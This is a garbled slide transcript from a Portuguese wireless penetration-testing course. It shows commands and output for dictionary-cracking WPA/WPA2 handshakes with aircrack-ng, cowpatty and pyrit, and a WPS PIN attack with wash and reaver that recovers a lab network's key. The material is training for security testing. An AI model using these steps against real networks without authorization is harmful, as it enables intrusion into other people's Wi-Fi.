time aircrack-ng –w popular_ptBR.dic dlink-01.cap

time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink […] 109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second real 9m2.988s user 9m2.468s sys 0m0.414s

time genpmk –f popular.dic -d dlink234.pmk -s dlink […] 109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second real 9m2.988s user 9m2.468s sys 0m0.414s _me pyrit –I popular.dic -‐o dlink.pmk -‐e dlink passthrough

Pyrit 0.4.1-‐dev (svn r308) (C) 2008-‐2011 Lukas Lueg hhp://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Computed 109216 PMKs total; 1865 PMKs per secondd real 1m20.753s user 5m2.437s sys 0m0.753s

Cowpatty

cowpahy 4.6 -‐ WPA-‐PSK dic_onary ahack. <[email protected]>

Collected all necessary data to mount crack against WPA2/PSK passphrase. Star_ng dic_onary ahack. Please be pa_ent. key no. 10000: 22222222 key no. 20000: 93833104 key no. 30000: And48560 key no. 40000: Cib00043 key no. 50000: enqetm17 key no. 60000: hamdan00 key no. 70000: liberta10 key no. 80000: Mil08187 The PSK is ”pxxxxxxxxxxxxxxxxxx". 89038 passphrases tested in 0.68 seconds: 130724.27 passphrases/second

cowpahy –d dlinkpop.pmk -‐s dlink -‐r dlink-‐01.cap

Cowpatty

time pyrit -r dlink-01.cap –I t-br_popular.dic attack_passthrough Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file 'dlink-01.cap' (1/1)... Parsed 19 packets (19 802.11-packets), got 1 AP(s) Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically. Tried 109216 PMKs so far; 1870 PMKs per second. The password is ’pxxxxxxxxxxxxx'. real 1m21.027s user 5m5.224s sys 0m0.724s

Pyrit

Pyrit pyrit benchmark Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Running benchmark (1239.9 PMKs/s)... \ Computed 1239.93 PMKs/s total. #1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0) #2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1) #3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0) #4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)

pyrit benchmark Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Running benchmark (1239.9 PMKs/s)... \ Computed 1239.93 PMKs/s total. #1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0) #2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1) #3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0) #4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)

Pyrit

pyrit benchmark Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Running benchmark (1880.5 PMKs/s)... / Computed 1880.52 PMKs/s total. #1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7) #2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)

Ataque ao WPS

Ataque ao WPS

WiFi Protected Setup Recuperar configuração

Reconfigurar AP

Registrar

PIN

PIN

# wash -‐i mon0 Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tac_cal Network Solu_ons, Craig Heffner <[email protected]> BSSID Channel RSSI WPS Version WPS Locked ESSID -‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐ 48:5B:39:B0:2D:2C 3 -‐54 1.0 No LABVIRUS

# reaver -‐i mon0 -‐b 48:5B:39:B0:D0:2C -‐v Reaver v1.4 WiFi Protected Setup Ahack Tool Copyright (c) 2011, Tac_cal Network Solu_ons, Craig Heffner <[email protected]> [+] Wai_ng for beacon from 48:5B:39:B0:D0:2C [+] Associated with 48:5B:39:B0:D0:2C (ESSID: LABVIRUS) [+] Trying pin 12345670 [+] WPS PIN: '12345670' [+] WPA PSK: ’labvirus2013' [+] AP SSID: ’LABVIRUS'

Dúvidas?

Perguntas?

Crí_cas?

Sugestões?

Siga a Clavis

http://clav.is/slideshare http://clav.is/twitter http://clav.is/facebook

Muito Obrigado!

[email protected]

[email protected]

Nelson Murilo Clavis Segurança da Informação

Clavis Teste de Invasao Sem Fio EAD

Documents

Transcript of Clavis Teste de Invasao Sem Fio EAD